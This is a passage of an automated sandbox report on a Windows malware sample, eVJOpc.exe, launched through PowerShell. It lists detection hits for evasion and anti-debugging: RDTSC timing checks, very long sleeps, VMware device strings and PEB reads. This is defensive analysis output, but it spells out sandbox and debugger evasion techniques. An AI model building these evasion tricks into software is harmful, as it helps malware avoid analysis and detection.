Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\eVJOpc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\eVJOpc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360 Thread sleep time: -30000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004088E0 rdtsc 9_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2440 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2440 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00405E93 FindFirstFileA,FindClose, 8_2_00405E93
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_004054BD
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402671 FindFirstFileA, 8_2_00402671
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.405345542.000000000EF44000.00000004.00000001.sdmp Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI.3
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.560332764.000000000089A000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp Binary or memory string: ,f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: powershell.exe, 00000001.00000002.365400070.00000000080D2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

barindex
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007AC0 tgisdk,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect, 8_2_10007AC0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004088E0 rdtsc 9_2_004088E0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B40A mov eax, dword ptr fs:[00000030h] 8_2_1000B40A
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B70E mov eax, dword ptr fs:[00000030h] 8_2_1000B70E
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B61E mov eax, dword ptr fs:[00000030h] 8_2_1000B61E
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B74C mov eax, dword ptr fs:[00000030h] 8_2_1000B74C
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B6CF mov eax, dword ptr fs:[00000030h] 8_2_1000B6CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov ecx, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B890AF mov eax, dword ptr fs:[00000030h] 9_2_00B890AF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49080 mov eax, dword ptr fs:[00000030h] 9_2_00B49080
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h] 9_2_00BC3884
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h] 9_2_00BC3884
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B458EC mov eax, dword ptr fs:[00000030h] 9_2_00B458EC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C02073 mov eax, dword ptr fs:[00000030h] 9_2_00C02073
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C11074 mov eax, dword ptr fs:[00000030h] 9_2_00C11074
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h] 9_2_00C14015
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h] 9_2_00C14015
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h] 9_2_00B60050
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h] 9_2_00B60050
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h] 9_2_00B761A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h] 9_2_00B761A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC69A6 mov eax, dword ptr fs:[00000030h] 9_2_00BC69A6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72990 mov eax, dword ptr fs:[00000030h] 9_2_00B72990
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A185 mov eax, dword ptr fs:[00000030h] 9_2_00B7A185
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C182 mov eax, dword ptr fs:[00000030h] 9_2_00B6C182
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BD41E8 mov eax, dword ptr fs:[00000030h] 9_2_00BD41E8
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h] 9_2_00B7513A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h] 9_2_00B7513A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov ecx, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h] 9_2_00B4B171
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h] 9_2_00B4B171
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C962 mov eax, dword ptr fs:[00000030h] 9_2_00B4C962
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h] 9_2_00B6B944
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h] 9_2_00B6B944
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B5AAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B5AAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B7FAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h] 9_2_00B7D294
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h] 9_2_00B7D294
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72AE4 mov eax, dword ptr fs:[00000030h] 9_2_00B72AE4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72ACB mov eax, dword ptr fs:[00000030h] 9_2_00B72ACB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h] 9_2_00B84A2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h] 9_2_00B84A2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0EA55 mov eax, dword ptr fs:[00000030h] 9_2_00C0EA55
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h] 9_2_00B4AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h] 9_2_00B4AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18A62 mov eax, dword ptr fs:[00000030h] 9_2_00C18A62
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov ecx, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B63A1C mov eax, dword ptr fs:[00000030h] 9_2_00B63A1C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B58A0A mov eax, dword ptr fs:[00000030h] 9_2_00B58A0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8927A mov eax, dword ptr fs:[00000030h] 9_2_00B8927A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h] 9_2_00BFB260
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h] 9_2_00BFB260
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BD4257 mov eax, dword ptr fs:[00000030h] 9_2_00BD4257
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72397 mov eax, dword ptr fs:[00000030h] 9_2_00B72397
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7B390 mov eax, dword ptr fs:[00000030h] 9_2_00B7B390
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h] 9_2_00B51B8F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h] 9_2_00B51B8F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFD380 mov ecx, dword ptr fs:[00000030h] 9_2_00BFD380
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0138A mov eax, dword ptr fs:[00000030h] 9_2_00C0138A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6DBE9 mov eax, dword ptr fs:[00000030h] 9_2_00B6DBE9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C15BA5 mov eax, dword ptr fs:[00000030h] 9_2_00C15BA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h] 9_2_00BC53CA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h] 9_2_00BC53CA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18B58 mov eax, dword ptr fs:[00000030h] 9_2_00C18B58
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h] 9_2_00B73B7A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h] 9_2_00B73B7A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4DB60 mov ecx, dword ptr fs:[00000030h] 9_2_00B4DB60
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0131B mov eax, dword ptr fs:[00000030h] 9_2_00C0131B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4F358 mov eax, dword ptr fs:[00000030h] 9_2_00B4F358
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4DB40 mov eax, dword ptr fs:[00000030h] 9_2_00B4DB40
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18CD6 mov eax, dword ptr fs:[00000030h] 9_2_00C18CD6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5849B mov eax, dword ptr fs:[00000030h] 9_2_00B5849B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C014FB mov eax, dword ptr fs:[00000030h] 9_2_00C014FB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
